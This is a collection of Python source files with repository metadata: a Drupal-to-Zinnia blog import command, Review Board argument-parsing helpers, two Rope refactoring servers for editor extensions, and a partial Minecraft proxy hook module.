term_query = drupal.session.query(drupal.TermData).filter(drupal.TermData.vid == vocabulary.vid)
statistics["drupal_total"] += term_query.count()
# Process each term item.
for term in term_query:
term_parent = drupal.session.query(drupal.TermHierarchy).filter(drupal.TermHierarchy.tid == term.tid).first().parent
# If this is a top-level category in vocabulary, mark the vocabulary
# pseudo-category itself as its parent instead (refer to vocabulary
# "category" by its name).
if term_parent == 0:
term_parent = vocabulary.name
# Set-up hierarchy information for this category.
hierarchy[term.tid] = term_parent
# Try to fetch existing, or create new category in Zinnia.
category, created = Category.objects.get_or_create(title=term.name, slug=slugify(term.name), description=term.description)
if created:
statistics["zinnia_new"] += 1
else:
statistics["zinnia_existing"] += 1
# Map the Drupal category to Zinnia category.
mapping[term.tid] = category.pk
# Update parent information for Zinnia categories (if they're not
# top-level ones).
for tid, tid_parent in hierarchy.iteritems():
if tid_parent != 0:
category = Category.objects.get(pk=mapping[tid])
category.parent = Category.objects.get(pk=mapping[tid_parent])
category.save()
return statistics, mapping
def extract_tags(drupal):
"""
Extracts tags from Drupal database. While being extracted the tags will be
stripped of forward slashes ('/'), replacing them with hyphens ('-').
Tags do not exist in Zinnia as objects of their own, so no creation of tags
needs to take place there. This function will mainly allow us to reduce
database workload (of traversing Drupal database) by having (id, tag) pairs
in a dictionary.
Arguments:
drupal
Drupal database from which the tags should be extracted. Should be an
instance of DrupalDatabase.
Returns:
Dictionary mapping the Drupal tag term ID into tag string.
"""
tag_mapping = {}
# Process all vocabularies that are marked to contains tags.
for vocabulary in drupal.session.query(drupal.Vocabulary).filter(drupal.Vocabulary.tags == 1).all():
# Fetch all terms of a tag vocabulary.
terms = drupal.session.query(drupal.TermData).filter(drupal.TermData.vid == vocabulary.vid).all()
# Set-up mapping for all terms in a vocabulary.
for term in terms:
# The tags in Zinnia are not allowed to contain slashes.
tag_mapping[term.tid] = term.name.replace("/", "-")
return tag_mapping
def import_comments(drupal, drupal_node, zinnia_entry, threaded_comments, user_mapping):
"""
Imports comments from Drupal node into Zinnia entry. Comments are created
only if they do not exist already.
Arguments:
drupal
Drupal database from which the comments should be extracted. Should be an
instance of DrupalDatabase.
drupal_node
Drupal node object from which the comments should be imported.
zinnia_entry
Zinna entry to which the comments should be attached.
threaded_comments
Specify whether the comments should be imported as threaded or not. If
set to True, zinnia-threaded-comments application must be installed as
well.
user_mapping
Mapping between Drupal user ID's and Zinnia user ID's. Generated by
import_users() function.
Returns:
Dictionary with import statistics (keys 'drupal_total', 'zinnia_new', and
'zinnia_existing')
"""
# Fetch the current Django site.
site = Site.objects.get_current()
# Holds mapping between comment IDs in Drupal and Comment IDs in
# Zinnia. This is used later on if setting-up threaded comment parents.
comment_mapping = {}
# Holds information about parent/child relatinships of Drupal comments. Keys
# are comment IDs of children, while values are comment IDs of parents.
hierarchy = {}
# Fetch all comments for a specific node, ordering them by creation
# timestamps.
drupal_comments = drupal.session.query(drupal.Comments).filter(drupal.Comments.nid == drupal_node.nid).order_by(drupal.Comments.timestamp)
# Set-up some statistics.
statistics = {
"drupal_total": drupal_comments.count(),
"zinnia_new": 0,
"zinnia_existing": 0,
}
# Process all comments from relevant Drupal node.
for drupal_comment in drupal_comments:
# If it was not the guest account that posted the comment, fetch the
# user if possible.
zinnia_comment_user = None
if drupal_comment.uid in user_mapping:
zinnia_comment_user = Author.objects.get(pk=user_mapping[drupal_comment.uid])
else:
zinnia_comment_user = None
# Try to fetch existing, or create new comment in Zinnia.
comment, created = Comment.objects.get_or_create(comment=drupal_comment.comment,
ip_address=drupal_comment.hostname,
submit_date=datetime.fromtimestamp(drupal_comment.timestamp, pytz.UTC),
is_public=True if drupal_comment.status == 0 else False,
user=zinnia_comment_user,
user_name=drupal_comment.name,
user_email=drupal_comment.mail,
user_url=drupal_comment.homepage,
object_pk=zinnia_entry.pk,
site_id=site.pk,
content_type=ContentType.objects.get_for_model(Entry),)
if created:
statistics["zinnia_new"] += 1
else:
statistics["zinnia_existing"] += 1
# Store mapping information between Drupal and Zinnia comments (used
# later on if setting-up hierarchy for threaded comments).
comment_mapping[drupal_comment.cid] = comment.pk
# Store parent/child information for threaded comments.
hierarchy[drupal_comment.cid] = drupal_comment.pid
# Update comment parent/child relationships if threaded comments were
# enabled.
if threaded_comments:
for cid, cid_parent in hierarchy.iteritems():
if cid_parent != 0:
comment = Comment.objects.get(pk=comment_mapping[cid])
comment.parent = Comment.objects.get(pk=comment_mapping[cid_parent])
comment.save()
# Fix counters.
zinnia_entry.comment_count = zinnia_entry.comments.count()
zinnia_entry.pingback_count = zinnia_entry.pingbacks.count()
zinnia_entry.trackback_count = zinnia_entry.trackbacks.count()
zinnia_entry.save(force_update=True)
return statistics
def import_content(drupal, user_mapping, category_mapping, tag_mapping, node_type, threaded_comments):
"""
Imports content from Drupal into Zinnia. Content is created only if it does
not exist already.
Arguments:
drupal
Drupal database from which the content should be imported. Should be an
instance of DrupalDatabase.
user_mapping
Mapping between Drupal user ID's and Zinnia user ID's. Generated by
import_users() function.
category_mapping
Mapping between Drupal category ID's and Zinnia category ID's. Generated
by import_categories() function.
tag_mapping
Mapping between Drupal tag ID's and Zinnia tag strings. Generated by
extract_tags() function.
node_type
Drupal node type that should be processed. Only the nodes belonging to
the specified node type will be processed.
threaded_comments
Specify whethere the comments should be imported as threaded or not. If
set to True, zinnia-threaded-comments application must be installed as
well.
Returns:
Dictionary with import statistics (keys 'drupal_total', 'zinnia_new', and
'zinnia_existing').
"""
# Get a list of all nodes of specific type, sorting them by date of
# creation.
nodes = drupal.session.query(drupal.Node).filter(drupal.Node.type == node_type,
drupal.Node.uid.in_(user_mapping.keys())).order_by(drupal.Node.created)
# Set-up statistics dictionary.
statistics = {
"drupal_total": nodes.count(),
"zinnia_new": 0,
"zinnia_existing": 0,
}
# Process each node.
for node in nodes:
# Extract the last revision of the node.
revisions = drupal.session.query(drupal.NodeRevisions).filter(drupal.NodeRevisions.nid == node.nid)
# Extract node data.
last = revisions.order_by(drupal.NodeRevisions.vid.desc()).first()
body = last.body
title = last.title
modified = datetime.fromtimestamp(last.timestamp, pytz.UTC)
created = datetime.fromtimestamp(node.created, pytz.UTC)
user = user_mapping[node.uid]
# Create the entry if it doesn't exist already.
zinnia_entry, created = Entry.objects.get_or_create(content=body, creation_date=created,
publication_date=created,
last_update=modified, title=title,
status=PUBLISHED, slug=slugify(title))
if created:
# Add relations (authors etc).
zinnia_entry.authors.add(user)
zinnia_entry.sites.add(Site.objects.get_current())
zinnia_entry.save()
# Import tags.
version_tags = drupal.session.query(drupal.TermNode).filter(drupal.TermNode.nid == last.nid, drupal.TermNode.vid == last.vid).all()
zinnia_entry.tags = ",".join([tag_mapping[t.tid] for t in version_tags if t.tid in tag_mapping])
zinnia_entry.save()
# Set-up categories for entry.
categories_query = drupal.session.query(drupal.TermNode).filter(drupal.TermNode.nid == last.nid, drupal.TermNode.vid == last.vid)
categories = [category_mapping[v.tid] for v in categories_query if v.tid in category_mapping]
zinnia_entry.categories.add(*[c for c in categories])
zinnia_entry.save()
# Import comments for an entry.
import_comments(drupal, node, zinnia_entry, threaded_comments, user_mapping)
statistics["zinnia_new"] += 1
print "Imported entry '%s'" % title
else:
statistics["zinnia_existing"] += 1
print "Skipping existing entry '%s'" % title
return statistics
###########
# Command #
###########
class Command(BaseCommand):
"""
Implements a custom Django management command used for importing Drupal blog
into Zinnia.
"""
help = """
Imports Drupal content into Zinnia.
The command will import the following:
- User information (username and mail only).
- Categories.
- Node content.
- Node comments (threaded, if using zinnia_threaded_comments).
Currently the script has the following limitations:
- No conversion of additional user information is performed.
- No conversion of formatting is performed. Content is copied as-is.
- Supports only MySQL-compatible database.
- Revision history is not preserved (Django Blog Zinnia does not support
revision history). Only the latest/current revision will be imported.
- Comment _titles_ are not preserved (Django Blog Zinnia does not support
comment titles)
"""
def add_arguments(self, parser):
parser.add_argument("-H", "--database-hostname", type=str, default="localhost",
help="Hostname of database server providing the Drupal database. Default is 'localhost'.")
parser.add_argument("-p", "--database-port", type=int, default=3306,
help="TCP port at which the database server is listening. Default is '3306'.")
parser.add_argument("-u", "--database-username", type=str, default="root",
help="Username that should be used for connecting to database server. Default is 'root'.")
parser.add_argument("-P", "--database-password", type=str, default=None,
dest="database_password_file",
help="Path to file containing the password for specified database username. If not set (default), the password will be read interactively.")
parser.add_argument("-n", "--node-type", type=str, default="blog",
help="Drupal Node type that should be processed. Default is 'blog'.")
parser.add_argument("-m", "--user-mapping", action=MappingAction, default=dict(),
help="Mapping of Drupal usernames to Zinnia usernames. Format is 'duser1=zuser1:duser2=zuser2:...:dusern=zusern'. Default is to use same username as in Drupal.")
parser.add_argument("-U", "--users", type=str, default=None,
help="Comma-separated list of Drupal users that should be imported, including user-created content. Default is to import content from all users.")
parser.add_argument("-t", "--threaded-comments", action="store_true",
default=False, dest="threaded_comments",
help="Import comments while preserving threading information. Requires zinnia-threaded-comments application. Default is not to use threaded comments.")
parser.add_argument("database_name", type=str,
help="Name of the database")
def handle(self, database_name, **options):
# Verify that
if options['threaded_comments'] and not hasattr(Comment, "parent"):
raise CommandError("Currently configured comment model does not have the 'parent' attribute, but threaded comment import has been requested. Check your COMMENTS_APP setting.")
# Read the password for Drupal database if it wasn't provided within a file.
if options['database_password_file']:
options['database_password'] = open(options['database_password_file'], "r").read().rstrip().lstrip()
else:
options['database_password'] = getpass.getpass("Database password for '%s'@'%s': " % (options['database_username'], database_name))
# Set-up SQLAlchemy ORM.
database_connection_url = "mysql://%s:%s@%s/%s" % (urllib.quote(options['database_username']),
urllib.quote(options['database_password']),
urllib.quote(options['database_hostname']),
urllib.quote(database_name))
engine = create_engine(database_connection_url)
drupal = DrupalDatabase(engine)
# Create list of users that should be imported.
users = options["users"]
if users:
users = users.split(",")
# Disconnect Zinnia signals.
disconnect_discussion_signals()
disconnect_entry_signals()
# Import the users.
with transaction.atomic():
user_stats, user_mapping = import_users(drupal, users=users, custom_mapping=options["user_mapping"])
# Import the categories.
with transaction.atomic():
category_stats, category_mapping = import_categories(drupal)
# Extract the tag mapping.
with transaction.atomic():
tag_mapping = extract_tags(drupal)
# Finally, import the actual content.
with transaction.atomic():
content_stats = import_content(drupal, user_mapping, category_mapping, tag_mapping, options['node_type'], options["threaded_comments"])
# Output a summary.
print
print "User import summary"
print "==================="
for key, value in user_stats.iteritems():
print "%s: %s" % (key, value)
print
print "Category import summary"
print "======================="
for key, value in category_stats.iteritems():
print "%s: %s" % (key, value)
print
print "Content import summary"
print "======================"
for key, value in content_stats.iteritems():
print "%s: %s" % (key, value)
| {
"repo_name": "azaghal/zinnia-drupal",
"path": "zinnia_drupal/management/commands/drupal62zinnia.py",
"copies": "1",
"size": "28475",
"license": "bsd-3-clause",
"hash": -5674756424895577000,
"line_mean": 37.7414965986,
"line_max": 189,
"alpha_frac": 0.6206496927,
"autogenerated": false,
"ratio": 4.2981132075471695,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5418762900247169,
"avg_score": null,
"num_lines": null
} |
"""Argument parsing utilities for command line tools."""
from __future__ import unicode_literals
import argparse
import os
import sys
import reviewboard
from reviewboard.cmdline.utils.console import get_console
class HelpFormatter(argparse.RawDescriptionHelpFormatter):
"""Formats help text by preserving paragraphs."""
indent_len = 2
def _fill_text(self, text, width, indent):
"""Return wrapped description text.
This will wrap each contained paragraph (separated by a newline)
individually.
Args:
text (unicode):
The text to wrap.
width (int, unused):
The terminal width.
indent (unicode, unused):
The string to prefix each line with, for indentation.
Returns:
unicode:
The wrapped text.
"""
console = get_console()
indent_len_str = ' ' * self.indent_len
return '\n'.join(
console.wrap_text(paragraph, indent=indent or indent_len_str)
for paragraph in text.split('\n')
)
class RBProgVersionAction(argparse.Action):
"""Display the Review Board/command version.
This is used instead of :py:mod:`argparse`'s default version handling
in order to print text unindented and unwrapped.
"""
def __init__(self, **kwargs):
"""Initialize the action.
Args:
**kwargs (dict):
Keyword arguments for the action.
"""
super(RBProgVersionAction, self).__init__(nargs=0, **kwargs)
def __call__(self, parser, *args, **kwargs):
"""Call the action.
This will display the version information directly to the terminal
and then exit.
Args:
parser (argparse.ArgumentParser):
The argument parser that called this action.
*args (tuple, unused):
Unused positional arguments.
**kwargs (dict, unused):
Unused keyword arguments.
"""
parser.exit(message=('\n'.join([
'Review Board/%s %s' % (parser.prog,
reviewboard.get_version_string()),
'Python %s' % sys.version.splitlines()[0],
'Installed to %s' % os.path.dirname(reviewboard.__file__),
'',
])))
| {
"repo_name": "chipx86/reviewboard",
"path": "reviewboard/cmdline/utils/argparsing.py",
"copies": "2",
"size": "2373",
"license": "mit",
"hash": 8393015104043398000,
"line_mean": 26.9176470588,
"line_max": 74,
"alpha_frac": 0.5710071639,
"autogenerated": false,
"ratio": 4.680473372781065,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6251480536681066,
"avg_score": null,
"num_lines": null
} |
# Arguments are:
# 1. Working directory.
# 2. Rope folder
import difflib
import io
import json
import os
import sys
import traceback
try:
import rope
from rope.base import libutils
from rope.refactor.rename import Rename
from rope.refactor.extract import ExtractMethod, ExtractVariable
import rope.base.project
import rope.base.taskhandle
except:
jsonMessage = {'error': True, 'message': 'Rope not installed', 'traceback': '', 'type': 'ModuleNotFoundError'}
sys.stderr.write(json.dumps(jsonMessage))
sys.stderr.flush()
WORKSPACE_ROOT = sys.argv[1]
ROPE_PROJECT_FOLDER = '.vim/.ropeproject'
class RefactorProgress():
"""
Refactor progress information
"""
def __init__(self, name='Task Name', message=None, percent=0):
self.name = name
self.message = message
self.percent = percent
class ChangeType():
"""
Change Type Enum
"""
EDIT = 0
NEW = 1
DELETE = 2
class Change():
"""
"""
EDIT = 0
NEW = 1
DELETE = 2
def __init__(self, filePath, fileMode=ChangeType.EDIT, diff=""):
self.filePath = filePath
self.diff = diff
self.fileMode = fileMode
def get_diff(changeset):
"""This is a copy of the code form the ChangeSet.get_description method found in Rope."""
new = changeset.new_contents
old = changeset.old_contents
if old is None:
if changeset.resource.exists():
old = changeset.resource.read()
else:
old = ''
# Ensure code has a trailing empty lines, before generating a diff.
# https://github.com/Microsoft/vscode-python/issues/695.
old_lines = old.splitlines(True)
if not old_lines[-1].endswith('\n'):
old_lines[-1] = old_lines[-1] + os.linesep
new = new + os.linesep
result = difflib.unified_diff(
old_lines, new.splitlines(True),
'a/' + changeset.resource.path, 'b/' + changeset.resource.path)
return ''.join(list(result))
class BaseRefactoring(object):
"""
Base class for refactorings
"""
def __init__(self, project, resource, name="Refactor", progressCallback=None):
self._progressCallback = progressCallback
self._handle = rope.base.taskhandle.TaskHandle(name)
self._handle.add_observer(self._update_progress)
self.project = project
self.resource = resource
self.changes = []
def _update_progress(self):
jobset = self._handle.current_jobset()
if jobset and not self._progressCallback is None:
progress = RefactorProgress()
# getting current job set name
if jobset.get_name() is not None:
progress.name = jobset.get_name()
# getting active job name
if jobset.get_active_job_name() is not None:
progress.message = jobset.get_active_job_name()
# adding done percent
percent = jobset.get_percent_done()
if percent is not None:
progress.percent = percent
if not self._progressCallback is None:
self._progressCallback(progress)
def stop(self):
self._handle.stop()
def refactor(self):
try:
self.onRefactor()
except rope.base.exceptions.InterruptedTaskError:
# we can ignore this exception, as user has cancelled refactoring
pass
def onRefactor(self):
"""
To be implemented by each base class
"""
pass
class RenameRefactor(BaseRefactoring):
def __init__(self, project, resource, name="Rename", progressCallback=None, startOffset=None, newName="new_Name"):
BaseRefactoring.__init__(self, project, resource,
name, progressCallback)
self._newName = newName
self.startOffset = startOffset
def onRefactor(self):
renamed = Rename(self.project, self.resource, self.startOffset)
changes = renamed.get_changes(self._newName, task_handle=self._handle)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, get_diff(item)))
else:
raise Exception('Unknown Change')
class ExtractVariableRefactor(BaseRefactoring):
def __init__(self, project, resource, name="Extract Variable", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
BaseRefactoring.__init__(self, project, resource,
name, progressCallback)
self._newName = newName
self._startOffset = startOffset
self._endOffset = endOffset
self._similar = similar
self._global = global_
def onRefactor(self):
renamed = ExtractVariable(
self.project, self.resource, self._startOffset, self._endOffset)
changes = renamed.get_changes(
self._newName, self._similar, self._global)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, get_diff(item)))
else:
raise Exception('Unknown Change')
class ExtractMethodRefactor(ExtractVariableRefactor):
def __init__(self, project, resource, name="Extract Method", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
ExtractVariableRefactor.__init__(self, project, resource,
name, progressCallback, startOffset=startOffset, endOffset=endOffset, newName=newName, similar=similar, global_=global_)
def onRefactor(self):
renamed = ExtractMethod(
self.project, self.resource, self._startOffset, self._endOffset)
changes = renamed.get_changes(
self._newName, self._similar, self._global)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, get_diff(item)))
else:
raise Exception('Unknown Change')
class RopeRefactoring(object):
def __init__(self):
self.default_sys_path = sys.path
self._input = io.open(sys.stdin.fileno(), encoding='utf-8')
def _rename(self, filePath, start, newName, indent_size):
"""
Renames a variable
"""
project = rope.base.project.Project(
WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False, indent_size=indent_size)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = RenameRefactor(
project, resourceToRefactor, startOffset=start, newName=newName)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({'diff': change.diff})
return valueToReturn
def _extractVariable(self, filePath, start, end, newName, indent_size):
"""
Extracts a variable
"""
project = rope.base.project.Project(
WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False, indent_size=indent_size)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = ExtractVariableRefactor(
project, resourceToRefactor, startOffset=start, endOffset=end, newName=newName, similar=True)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({'diff': change.diff})
return valueToReturn
def _extractMethod(self, filePath, start, end, newName, indent_size):
"""
Extracts a method
"""
project = rope.base.project.Project(
WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False, indent_size=indent_size)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = ExtractMethodRefactor(
project, resourceToRefactor, startOffset=start, endOffset=end, newName=newName, similar=True)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({'diff': change.diff})
return valueToReturn
def _serialize(self, identifier, results):
"""
Serializes the refactor results
"""
return json.dumps({'id': identifier, 'results': results})
def _deserialize(self, request):
"""Deserialize request from VSCode.
Args:
request: String with raw request from VSCode.
Returns:
Python dictionary with request data.
"""
return json.loads(request)
def _process_request(self, request):
"""Accept serialized request from VSCode and write response.
"""
request = self._deserialize(request)
lookup = request.get('lookup', '')
if lookup == '':
pass
elif lookup == 'rename':
changes = self._rename(request['file'], int(
request['start']), request['name'], int(request['indent_size']))
return self._write_response(self._serialize(request['id'], changes))
elif lookup == 'extract_variable':
changes = self._extractVariable(request['file'], int(
request['start']), int(request['end']), request['name'], int(request['indent_size']))
return self._write_response(self._serialize(request['id'], changes))
elif lookup == 'extract_method':
changes = self._extractMethod(request['file'], int(
request['start']), int(request['end']), request['name'], int(request['indent_size']))
return self._write_response(self._serialize(request['id'], changes))
def _write_response(self, response):
sys.stdout.write(response + '\n')
sys.stdout.flush()
def watch(self):
self._write_response("STARTED")
while True:
try:
self._process_request(self._input.readline())
except:
exc_type, exc_value, exc_tb = sys.exc_info()
tb_info = traceback.extract_tb(exc_tb)
jsonMessage = {'error': True, 'message': str(exc_value), 'traceback': str(tb_info), 'type': str(exc_type)}
sys.stderr.write(json.dumps(jsonMessage))
sys.stderr.flush()
if __name__ == '__main__':
RopeRefactoring().watch()
| {
"repo_name": "jwatson/dotfiles",
"path": "config/coc/extensions/node_modules/coc-python/pythonFiles/refactor.py",
"copies": "1",
"size": "10906",
"license": "mit",
"hash": -5576505466185262000,
"line_mean": 34.9933993399,
"line_max": 174,
"alpha_frac": 0.6114982578,
"autogenerated": false,
"ratio": 4.1930026912725875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0024357789264730124,
"num_lines": 303
} |
# Arguments are:
# 1. Working directory.
# 2. Rope folder
import io
import sys
import json
import traceback
import rope
from rope.base import libutils
from rope.refactor.rename import Rename
from rope.refactor.extract import ExtractMethod, ExtractVariable
import rope.base.project
import rope.base.taskhandle
WORKSPACE_ROOT = sys.argv[1]
ROPE_PROJECT_FOLDER = sys.argv[2]
class RefactorProgress():
"""
Refactor progress information
"""
def __init__(self, name='Task Name', message=None, percent=0):
self.name = name
self.message = message
self.percent = percent
class ChangeType():
"""
Change Type Enum
"""
EDIT = 0
NEW = 1
DELETE = 2
class Change():
"""
"""
EDIT = 0
NEW = 1
DELETE = 2
def __init__(self, filePath, fileMode=ChangeType.EDIT, diff=""):
self.filePath = filePath
self.diff = diff
self.fileMode = fileMode
class BaseRefactoring(object):
"""
Base class for refactorings
"""
def __init__(self, project, resource, name="Refactor", progressCallback=None):
self._progressCallback = progressCallback
self._handle = rope.base.taskhandle.TaskHandle(name)
self._handle.add_observer(self._update_progress)
self.project = project
self.resource = resource
self.changes = []
def _update_progress(self):
jobset = self._handle.current_jobset()
if jobset and not self._progressCallback is None:
progress = RefactorProgress()
# getting current job set name
if jobset.get_name() is not None:
progress.name = jobset.get_name()
# getting active job name
if jobset.get_active_job_name() is not None:
progress.message = jobset.get_active_job_name()
# adding done percent
percent = jobset.get_percent_done()
if percent is not None:
progress.percent = percent
if not self._progressCallback is None:
self._progressCallback(progress)
def stop(self):
self._handle.stop()
def refactor(self):
try:
self.onRefactor()
except rope.base.exceptions.InterruptedTaskError:
# we can ignore this exception, as user has cancelled refactoring
pass
def onRefactor(self):
"""
To be implemented by each base class
"""
pass
class RenameRefactor(BaseRefactoring):
def __init__(self, project, resource, name="Rename", progressCallback=None, startOffset=None, newName="new_Name"):
BaseRefactoring.__init__(self, project, resource,
name, progressCallback)
self._newName = newName
self.startOffset = startOffset
def onRefactor(self):
renamed = Rename(self.project, self.resource, self.startOffset)
changes = renamed.get_changes(self._newName, task_handle=self._handle)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, item.get_description()))
else:
raise Exception('Unknown Change')
class ExtractVariableRefactor(BaseRefactoring):
def __init__(self, project, resource, name="Extract Variable", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
BaseRefactoring.__init__(self, project, resource,
name, progressCallback)
self._newName = newName
self._startOffset = startOffset
self._endOffset = endOffset
self._similar = similar
self._global = global_
def onRefactor(self):
renamed = ExtractVariable(
self.project, self.resource, self._startOffset, self._endOffset)
changes = renamed.get_changes(
self._newName, self._similar, self._global)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, item.get_description()))
else:
raise Exception('Unknown Change')
class ExtractMethodRefactor(ExtractVariableRefactor):
def __init__(self, project, resource, name="Extract Method", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
ExtractVariableRefactor.__init__(self, project, resource,
name, progressCallback, startOffset=startOffset, endOffset=endOffset, newName=newName, similar=similar, global_=global_)
def onRefactor(self):
renamed = ExtractMethod(
self.project, self.resource, self._startOffset, self._endOffset)
changes = renamed.get_changes(
self._newName, self._similar, self._global)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, item.get_description()))
else:
raise Exception('Unknown Change')
class RopeRefactoring(object):
def __init__(self):
self.default_sys_path = sys.path
self._input = io.open(sys.stdin.fileno(), encoding='utf-8')
def _extractVariable(self, filePath, start, end, newName):
"""
Extracts a variable
"""
project = rope.base.project.Project(WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = ExtractVariableRefactor(project, resourceToRefactor, startOffset=start, endOffset=end, newName=newName)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({'diff':change.diff})
return valueToReturn
def _extractMethod(self, filePath, start, end, newName):
"""
Extracts a method
"""
project = rope.base.project.Project(WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = ExtractMethodRefactor(project, resourceToRefactor, startOffset=start, endOffset=end, newName=newName)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({'diff':change.diff})
return valueToReturn
def _serialize(self, identifier, results):
"""
Serializes the refactor results
"""
return json.dumps({'id': identifier, 'results': results})
def _deserialize(self, request):
"""Deserialize request from VSCode.
Args:
request: String with raw request from VSCode.
Returns:
Python dictionary with request data.
"""
return json.loads(request)
def _process_request(self, request):
"""Accept serialized request from VSCode and write response.
"""
request = self._deserialize(request)
lookup = request.get('lookup', '')
if lookup == '':
pass
elif lookup == 'extract_variable':
changes = self._extractVariable(request['file'], int(request['start']), int(request['end']), request['name'])
return self._write_response(self._serialize(request['id'], changes))
elif lookup == 'extract_method':
changes = self._extractMethod(request['file'], int(request['start']), int(request['end']), request['name'])
return self._write_response(self._serialize(request['id'], changes))
def _write_response(self, response):
sys.stdout.write(response + '\n')
sys.stdout.flush()
def watch(self):
self._write_response("STARTED")
while True:
try:
self._process_request(self._input.readline())
except Exception as ex:
message = ex.message + ' \n' + traceback.format_exc()
sys.stderr.write(str(len(message)) + ':' + message)
sys.stderr.flush()
if __name__ == '__main__':
RopeRefactoring().watch()
| {
"repo_name": "DonJayamanne/pythonVSCode",
"path": "src/test/pythonFiles/refactoring/standAlone/refactor.py",
"copies": "1",
"size": "8579",
"license": "mit",
"hash": -5974611509158667000,
"line_mean": 34.0163265306,
"line_max": 174,
"alpha_frac": 0.6128919454,
"autogenerated": false,
"ratio": 4.278802992518703,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00127521151296757,
"num_lines": 245
} |
# arguments are:
# packetid unsigned byte ID of packet
# packet dict decoded packet
# serverprops class see mcproxy.py for details
# serverqueue queue use these to insert new packets
# clientqueue queue
import positioning, gui, mcpackets
def timeHook(packetid, packet, serverprops):
time = packet['time']
mchour = int(((time + 6000) % 24000) / 1000)
mcminute = int(((time % 1000) / 1000.0) * 60.0)
serverprops.playerdata['time'] = (mchour,mcminute)
serverprops.gui['time'].setText("%i:%.2i" % serverprops.playerdata['time'])
def playerPosHook(packetid, packet, serverprops):
serverprops.playerdata['location'] = (packet['x'], packet['y'], packet['z'])
serverprops.gui['pos'].setText("X: %.2f\nY: %.2f\nZ: %.2f" % serverprops.playerdata['location'])
gui.playerDataUpdate(serverprops)
def playerLookHook(packetid, packet, serverprops):
serverprops.playerdata['angle'] = (packet['rotation'],packet['pitch'])
rot = positioning.sane_angle(serverprops.playerdata['angle'][0])
pitch = serverprops.playerdata['angle'][1]
serverprops.gui['angle'].setText("Rotation: %i\nPitch: %i\nDirection: %s" % (rot, pitch, positioning.humanReadableAngle(packet['rotation'])))
gui.playerDataUpdate(serverprops)
def timeChangeHook(packetid, packet, serverprops):
packet['time'] = 9000
return packet
def viewCustomEntities(packetid, packet, serverprops):
from StringIO import StringIO
from nbt import NBTFile
from gzip import GzipFile
print("@x:%i,y:%i,z%i"%(packet['x'],packet['y'],packet['z']))
payload = NBTFile(buffer=GzipFile(fileobj=StringIO(packet['payload'])))
print(payload.pretty_tree())
def spawnHook(packetid, packet, serverprops):
serverprops.waypoint['Spawn'] = (packet['x'],packet['y'],packet['z'])
serverprops.gui['wplist'].addItem("Spawn")
gui.playerDataUpdate(serverprops)
positioning.loadWaypoints(serverprops)
current_inv = {}
def inventoryTracker(packetid, packet, serverprops):
if packet['type']==1:
current_inv = packet['items']
namedhooks = {
'timeHook': { 'func': timeHook, 'packet': 'time'},
'playerPosHook': { 'func': playerPosHook, 'packet': 'playerposition'},
'playerLookHook': { 'func': playerLookHook, 'packet': 'playerlook'},
'viewCustomEntities':{'func':viewCustomEntities,'packet': 'complexent'},
'inventoryTracker': { 'func': inventoryTracker, 'packet': 'inventory'},
'timeChangeHook': {'func': timeChangeHook, 'packet': 'time'},
'spawnPosition': {'func': spawnHook, 'packet': 'spawnposition'},
}
hook_to_name = dict([(namedhooks[id]['func'], id) for id in namedhooks])
def addHook(serverprops,hookname):
if hookname in namedhooks:
packet = namedhooks[hookname]['packet']
hookclass = namedhooks[hookname]['func']
mcpackets.decoders[mcpackets.name_to_id[packet]]['hooks'].append(hookclass)
gui.removeFromMenu(serverprops.gui['hooklist'],hookname)
serverprops.gui['hookactive'].addItem(hookname)
else:
print("hook %s not found" % hookname)
def removeHook(serverprops,hookname):
for decoder in mcpackets.decoders.values():
for hook in decoder['hooks']:
if hook_to_name[hook] == hookname:
decoder['hooks'].remove(hook)
gui.removeFromMenu(serverprops.gui['hookactive'],hookname)
serverprops.gui['hooklist'].addItem(hookname)
def setupInitialHooks(serverprops):
for hook in namedhooks:
serverprops.gui['hooklist'].addItem(hook)
addHook(serverprops,'timeHook')
addHook(serverprops,'playerPosHook')
addHook(serverprops,'playerLookHook')
addHook(serverprops,'spawnPosition') | {
"repo_name": "gm-stack/mcproxy",
